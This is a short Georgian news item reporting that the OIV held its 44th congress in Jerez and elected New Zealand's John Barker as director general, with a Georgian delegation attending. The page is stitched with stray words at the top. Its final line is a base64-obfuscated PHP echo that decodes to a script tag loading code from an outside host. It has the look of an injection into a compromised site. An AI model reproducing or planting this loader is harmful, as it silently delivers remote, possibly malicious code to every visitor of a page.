celsiusi
ავერსი საქკაბელი

ვაზისა და ღვინის საერთაშორისო ორგანიზაციას OIV ახალი გენერალური დირექტორი ჰყავს.

OIV-ის რიგით 44-ე მსოფლიო კონგრესი ესპანეთის ქალაქ ხერესში გაიმართა. კონგრესს დაესწრო ქართული დელეგაციაც, რომელსაც ღვინის ეროვნული სააგენტოს თავმჯდომარე ლევან მეხუზლა ხელმძღვანელობდა.

კონგრესის ფარგლებში გაიმართა რიგით 21-ე გენერალური ასამბლეა, სადაც ვაზისა და ღვინის საერთაშორისო ორგანიზაციას გენერალურ დირექტორად ახალი ზელანდიის  წარმომადგენელი ჯონ ბარკერი აირჩიეს.

ვაზისა და ღვინის საერთაშორისო ორგანიზაცია #OIV წარმოადგენს მთავრობათაშორის ორგანიზაციას, რომელშიც გაწევრიანებულია 45 ქვეყანა. ორგანიზაციის ძირითად საქმიანობას წარმოადგენს მეღვინეობის დარგის ტექნიკური რეზოლუციებისა და სტანდარტების შემუშავება-ჰარმონიზაცია, სამეცნიერო კვლევების ხელშეწყობა და, ზოგადად, დარგის განვითარებაზე ზრუნვა.

301
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");